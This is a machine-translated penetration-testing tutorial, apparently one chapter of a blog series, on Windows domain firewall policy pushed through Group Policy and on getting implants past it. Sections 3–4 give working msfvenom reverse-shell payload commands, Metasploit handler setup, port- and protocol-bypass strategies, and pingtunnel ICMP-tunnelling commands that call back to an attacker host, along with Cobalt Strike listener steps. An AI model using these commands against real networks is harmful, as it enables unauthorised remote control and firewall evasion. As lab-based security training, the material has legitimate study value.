1. Preamble
In the previous chapter on domain information collection, we have a general understanding of some information collection about the domain, good information collection, can maximize the realization of the goals we want, and when we carry out intranet penetration, we are usually through the WEB file upload, Command execution and other operations have obtained certain permissions, and when we obtain these permissions, we still want to obtain more operations, then we may encounter domains, and in the domain, our ultimate goal is to obtain the permission of domain control, and after obtaining the domain control permission, we have achieved our ultimate goal, and if there is no domain in the intranet, then it is simple.
And this chapter mainly involves the knowledge of domain firewalls, if we encounter what to do after turning on the domain firewall...
2. Domain Firewall
Configure firewalls uniformly using domain group policies/scripts
At present, most of the enterprise intranets are domain environments, and some enterprise applications require the client to open a certain port such as ping, if the enterprise environment is large, thousands of clients will be set one by one will be a waste of work efficiency and inflexible solutions;
Here we will briefly introduce the test of using domain control to achieve network-wide firewall policy synchronization.
The host in the domain usually opens the firewall, and the opening and establishment of the firewall are based on the domain control to manage, simply put, the administrator control, the user in the intranet is not authorized to establish, if the intranet user needs anything, then the domain control administrator, can set up the corresponding inbound and outbound rules for this host, of course, you can also set up global synchronization, so if in the intranet infiltration, if you encounter the domain control and still open the firewall is a very troublesome thing.
2.1. Enable firewall synchronization test for domain control
First of all, we need to prepare a domain controller, a domain host, as a demonstration, first look at whether it is a domain environment, in fact, this is already known through the content of the previous chapter, the role and explanation of this command, I will not explain it here.
2.1.1. View the Domain Host Firewall Policy
Here we first take a look at what the policy of the host firewall in the domain is, and then in combination with the domain control to deliver the policy, to determine whether the synchronization is successful, by viewing, you can see that all are enabled.
2.1.2. Domain Control Firewall Policy Delivery Synchronization
Here, the firewall policy is set to allow the hosts in the domain to synchronize.
2.1.2.1. Create Group Policy
In this example, we use domain control to deliver policies to the firewall.
Start > Administrative Tools > Group Policy Management > Forest > Domains > Right-click Domains > Create GPOs > Set the name
2.1.2.2. Edit Group Policy
Here you can edit the Group Policy, right-click the Group Policy "Edit" pop-up window is
2.1.2.3. Edit the firewall
Computer Configuration > Policies > Windows Settings > Advanced Security Windows > Advanced Security Windows > Windows Firewall Properties > Settings > Domain Firewall > Private Firewall Off > Public Firewall Off Application
2.1.2.4. Synchronize firewall policy
About the synchronization firewall policy here,I found that I clicked force directly,It doesn't seem to have any response.,It seems to be a bit of a problem when the command is restarted.,But after restarting, the policy is synchronized normally.。
Official explanation: Group Policy is automatically refreshed when a domain member computer is restarted or when a user logs on to a domain member computer. In addition, Group Policy is refreshed periodically. By default, this periodic refresh is performed every 90 minutes, with a random offset of no more than 30 minutes.
gpupdate ##更新组策略 2.2. Domain-controlled inbound and outbound rule synchronization
In a domain controller, in some cases, the firewall is turned off, but the administrator will issue inbound rules from the domain controller, such as allowing only a host to access port 3389 of the domain controller, or passing different policies according to different applications.
2.2.1. View domain host inbound and outbound rules
Let's take a look at the outbound and inbound rules to determine whether the subsequent operations are successful.
2.2.1.1. Outbound Rules
On the domain host, open the Administrative Tools Advanced Security Windows Firewall Outbound Rules
2.2.1.2. Inbound Rules
On the domain host, open the Administrative Tools > Advanced Security Windows Firewall Inbound Rules
2.2.2. Domain-controlled outbound rules are delivered for synchronization
Let's go back to the group policy that Domain Control just created, click on the advanced Windows Firewall to see the inbound and outbound rules, and there is nothing by default.
2.2.2.1. Access to Baidu
Here we are going to create a situation where access to Baidu is prohibited, here we can first take a look at whether we can access Baidu, and we can see that Baidu can be accessed.
2.2.2.2. Domain control setting rules
At this point, we need to understand what is an inbound rule and what is an outbound rule. To put it simply, when you need to access someone else, it's outbound, and when someone accesses the service you provide, it's inbound.
Here I directly set to turn off all TCP ports.,The specific settings must not be introduced.,There's a lot of this Baidu.,And you can understand it.。
Domain Control Settings: Group Policy > Advanced Security > Windows Outbound Rules
2.2.2.3. Synchronization Policy
When the domain controller is successfully added, it can be synchronized on the domain host, here you can still use the command & restart to operate, and then we open the management tool "Advanced Security Windows Firewall" outbound rules
2.2.2.4. Test access to Baidu
As you can see from the image below, it is no longer accessible.
2.2.3. Domain Control Inbound Rule Delivery Synchronization
I won't test it here, and there will be related tests later, which are essentially the same as the outbound settings, but to understand the direction of the outbound and inbound.
3. Stand-alone test
Mainly test,Some restrictions that may be encountered in the intranet,How to solve the problem that our horses can't go online,Of course, the content of this chapter will only involve part of it.,After all, there's a lot of content about this aspect.,It's impossible to finish it in one chapter.。
Here we use MSF's horses for testing.
3.1. Protocol Reference
Note that the protocol is backward compatible, for example, the TCP protocol is banned, do you think the http protocol can still be used?
3.2. Common Bypasses
In fact, there are many situations here, and I may not be able to test them all here, so let's talk about the various interceptions and corresponding solutions that may exist in advance, but there is another point to note that if the set policy is really rigorous, it may really not be broken, such as: only allow the port to be used again, and the protocol to be used only is allowed to be used again, unless you can pass the third-party software vulnerability, Or directly get the domain control, otherwise it may really be out of line, of course, it's my personal understanding, the big guy must have some other operations.
1.限制端口分为:入站限制端口、出站限制端口、出入站均限制端口。
入站限制端口,出站未限制端口,使用反向连接。
出站限制端口,入站未显示端口,使用正向连接。
出入站均限制端口,使用端口绕过进行连接,建议配合反向连接。
2.限制协议分为:入站限制、出战限制、出入均限制,这些限制又分为:单协议限制、多协议限制、全部限制。
入站限制:
单协议限制,使用其它协议或者反向连接绕过。
多协议限制,使用未被限制的协议或者反向连接绕过。
全部协议限制,使用放弃或者反向连接绕过,但正常不会将所以协议都封闭的。
出战限制:
参考上面使用正向连接绕过。
出入均限制:
单协议限制,使用其它协议绕过。
多协议限制,使用未被限制的协议绕过。
全部协议限制,使用放弃绕过,但正常不会将所以协议都封闭的。 3.3. Restrict port online
In some cases, the administrator is to close some useless ports, or open some whitelist ports for some authorized to communicate, here we will test the port restrictions, after all, the test environment is built by itself, and in the real environment there will be some differences, so it is just for reference.
For the bypass method that has not been demonstrated, refer to 3.1 Common bypass methods to learn the operation by yourself, otherwise you need to write too much.
3.3.1. Set outbound port rules
As for setting the rules, I won't go into detail about the process of setting up here, let's talk about the background in advance, we use the horse of port 5555, and the host is forbidden to communicate with port 1000-65535 externally, so we can use a replacement port to communicate.
As you can see from the figure below, we have set a rule that prohibits external communication on TCP port 1000-65535.
3.3.2. MSF generates Trojans
Here we use MSF to generate a Trojan.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=5555 -f exe > msf.exe 3.3.3. MSF开启监听
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.20
set LPORT 5555
run 3.3.4. Upload and run the Trojan
If anyone asks how the Trojan is uploaded, I don't know how to explain it to you.
3.3.5. Check Status
You can see that after the Trojan is executed, the connection is not established, which proves that the blocking is successful, so it is very simple, you go to replace a port to go online, for example, here I replace a 999 port.
3.3.6. State after port replacement
Here you can see that after replacing the port, it will be successfully launched, and some people here feel that it seems to be very simple, but maybe in the actual situation, it will not be so simple to just block the port and bypass this situation, it is more likely to block the protocol.
3.4. Restrict Protocol Listing
The specific bypass ideas for restricting protocols have been written above, and I wanted to give an example, but I have gone through a lot of documents and have not covered how to generate other types of Trojans, in short, it is still too vegetable, many Trojans are still based on TCP connections, as mentioned before, when the TCP protocol is banned, some related protocols such as HTTP, HTTPS, etc. cannot be used.
However, in one of the following operations, it is indeed realized that when the TCP protocol is blocked, the ICMP protocol can be used to connect, and in short, the disabling the TCP protocol is to prohibit TCP from connecting with the outside, so the traffic can be forwarded to ICMP for operation.
4. Domain Policy Testing
Regarding this domain policy test, the main thing involved is how to go online if the host does not have a network, and how to operate if the host has a network but cannot be online due to domain policy restrictions.
If the inbound is blocked, you can actually push back the following ideas, and more specific ideas will be said slowly in the future.
1.主机出站TCP封杀,入站无封杀,但无互联网网络
绕过思路:
通过正向连接方式,并且需要域内一台可以上互联网的主机,同时可以与目标主机通信的,这时就可以利用域内可以上互联网的这台主机,把目标主机的数据交予它进行控制。
2.主机出站TCP封杀,入站无封杀,有互联网网络
绕过思路:
这个有两种方式,一种就是上述提到的方式,还有一种就是采取隧道技术,把流量引到其它协议上通信。 4.1. Background
After the domain controller uses a policy to set the firewall synchronization rules of the hosts in the domain, the hosts in the domain are restricted from TCP out of the network, and the rules are set to the battle rules, and in the process of penetration testing, the shell permission is obtained through other means, and the operation needs to be carried out.
The above background is mainly for the second clause mentioned above, here we can use forward connection or tunnel technology, and forward connection we will not involve for the time being, let's talk about tunnel technology first.
4.1.1. Introduction to tunneling technology
In the actual network, it is usually checked by various border devices, software/hardware firewalls, IPS, IDS, situational awareness, etc., and if the firewall detects an abnormality, it will be automatically blocked, for example, if you set the firewall to not allow host A to access host B, then when host A goes to visit host B, the firewall will intercept it after detecting the exception, so that it cannot communicate.
For example, according to the above background, the firewall intercepts the TCP protocol and makes it unable to access the Internet, which will lead to our inability to make the Trojan online when we do penetration testing, so if the ICMP protocol is not restricted, then the packet can be encapsulated in the ICMP protocol for communication, and then pass through the firewall, and when the packet reaches the destination, the packet will be restored, and the restored packet will be sent to the corresponding server。
4.2. MSF online cases without going out of the network
Here is a case of not going online, ICMP protocol, usually speaking, is not prohibited, because ping needs to use ICMP protocol, and ping is the easiest way to test connectivity, so it is usually not banned.
4.2.1. Tool Preparation
Here we need to convert TCP traffic into ICMP, so we need to use tools, here are three ICMP projects, this experiment we used pingtunnel.
SPP:https://gitcode.com/esrrhs/spp?utm_source=csdn_github_accelerator&isLogin=1
icmpsh:https://gitcode.com/bdamele/icmpsh?utm_source=csdn_github_accelerator&isLogin=1
pingtunnel:https://gitcode.com/esrrhs/pingtunnel?utm_source=csdn_github_accelerator&isLogin=1
4.2.1.1. Download server
Here we need to download the server first, we download Linux, because we need to connect to CS, msf need to use the Linux system, so we use Linux more conveniently.
Note that the download here is very simple, but in the introduction, there is no direct indication of the server and the client, so a little helpless, I consulted a lot of information, all of them directly say how to use, and some tools have the same name, but it's not this tool, and it's helpless, so I'll download them one by one to test...
After downloading it here, it's a ZIP compression.,We unzip it.,And then upload the file to the Linux system.,Although it's Linux.,But you should be able to guess that it's actually kali.。
4.2.1.2. Run the server
The main purpose of running the server here is to test whether it can run normally, and it needs to be executed with the highest privilege.
sudo ./pingtunnel -type server 4.2.1.3. Download the client
Here we need to forward the Windows system, then we will download the Windows system.
4.2.1.4. Upload client
Here we will unzip the downloaded client and upload it to the target host.
4.2.2. Preparation
Here we will follow the background introduction mentioned above to carry out the simulation.
4.2.2.1. Target host situation
Notes:
If you find that the simulation environment you set up cannot access Baidu, and the ping is different, please turn on DC, DC is also enabled for domain control virtual machines.
It can be seen that there is a policy named baidu in the battle rules of the target host, which shows that TCP traffic is out of the network, and under normal circumstances, we cannot go online if we upload the Trojan directly, because the Trojans are TCP connections, so it will cause our Trojans to be unable to go online.
Here we test Baidu again, we can see that we can ping Baidu, but we can't access Baidu, this is because ping is ICMP protocol, and access to Baidu is TCP protocol.
4.2.2.2. Attack aircraft situation
Here we can turn on the listener.
4.2.3. MSF Settings
There are many points we need to pay attention to here, because we used MSF to directly generate a Trojan with a remote connection, such as what is the IP of your attack aircraft, then the IP of the remote connection when generating a Trojan is your IP of the attack aircraft, but it is different here, let's introduce it below.
4.2.3.1. Distinction introduction
You may find that the Trojan we generated here is 127.0.0.1, which is due to the need to cooperate with the TCP to ICMP tool just now, you can see the following commands I will explain one by one:
MSF generates a Trojan: Since the TCP on the target host has been blocked, if we still write the IP address of the attack machine, then when the Trojan is run, it will be directly intercepted, causing the Trojan to fail, and if the Trojan is set to a local address, then it will not be blocked, but it will stay in the local area, but this can ensure that the Trojan is running.
Tool forwarding command: The tool forwards, first the tool encapsulates the traffic of the 127.0.0.1:5555 port of the Trojan into ICMP traffic, and then forwards this traffic to 192.168.10.20:6666, and 192.168.10.20 is our attack aircraft, so as to complete the whole set of traffic encapsulation and forwarding.
And the port we want to listen to, in the past, we listened as much as the port set by the Trojan horse to connect back to us, but now the port we want to listen to is the port forwarded back by the tool, that is, 6666.
MSF生成木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe > msf.exe
工具转发命令:
pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.10.20 -t 192.168.10.20:6666 -tcp 1 -noprint 1 -nolog 1 4.2.3.2. Generate Trojans
Regarding the generation of Trojans, the commands are all above, I will not talk about them here, and then upload the Trojan to the target machine.
4.2.3.3. Set listener
In this case, we need to set the IP address of the listener to 0.0.0.0 to ensure that the listener can be monitored normally.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run 4.2.4. Formal Testing
At this point, our preliminary preparations are OK, and let's start the official operation.
4.2.4.1. Target Host Testing
Here we will run the Trojan on the target host, and then run the tool, the main thing here is to run the tool with the highest permission, in short, when you get the host in the domain, you need to elevate the privilege first, and then forward.
Here I found that if the Trojan is executed first and then the tool is run, MSF cannot be launched, and the tool needs to be run first, and then the Trojan can be executed.
pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.10.20 -t 192.168.10.20:6666 -tcp 1 -noprint 1 -nolog 1 4.2.4.2. Check the forwarding traffic
You can see that there is a lot of traffic forwarding here.
4.2.4.3. Check the online status
Here I found that I don't know why the Trojan seems to be running a little abnormally and is easy to drop, but it can be launched normally.
4.3. Cases of CS online without going out of the network
I won't say much about the preliminary preparation here.,Let's get started directly.,The preliminary preparation and tool preparation are the same operations.,Let's set up CS directly.
4.3.1. Set CS listener
We've analyzed it before, so we're going to set up two listeners, one for generating Trojans and one for receiving returns.
4.3.1.1. Listener 1
Here you need to set all IP addresses to 127.0.0.1.
4.3.1.2. Listener 2
This listener is mainly used to forward the information returned by the receiving tool, so you need to set the listener locally.
4.3.2. Generating Trojans
At this point, you can generate a Trojan and upload it to the target host.
4.3.2.1. Generate stageless Trojans
关于stageless:
Stage is a stager, which can be directly understood as a collection of stager and the data it requests. Stage is safer than Stager, but it is larger. Moreover, when the intranet penetrates, you can basically only use stage, which will be very troublesome to use stager, stager is a segmented transmission of payload, and using stager sometimes causes the target to fail to go online. The only drawback of Stage is that it is relatively large in comparison.
4.3.2.2. Set the listener
To set the listener here, you must select Listener 1.
4.3.3. Formal Testing
At this point, we can officially test it through the above operations, let's first see if the environment has changed, whether it can still only ping Baidu, unable to access Baidu. You can see that this is still the case through testing.
4.3.3.1. Target Host Testing
Here we will run the tool and then the Trojan just like MSF.
pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.10.20 -t 192.168.10.20:6666 -tcp 1 -noprint 1 -nolog 1 4.3.3.2. Check the forwarding status
You can see that the forwarding was successful.
4.3.3.3. Check the online status
Here we can also see the successful launch.
5. Summary
There are still many ways to bypass in the domain, but it is impossible to write them all, and the level is limited, and it is also learning, and there will be a lot of intranet content in the future.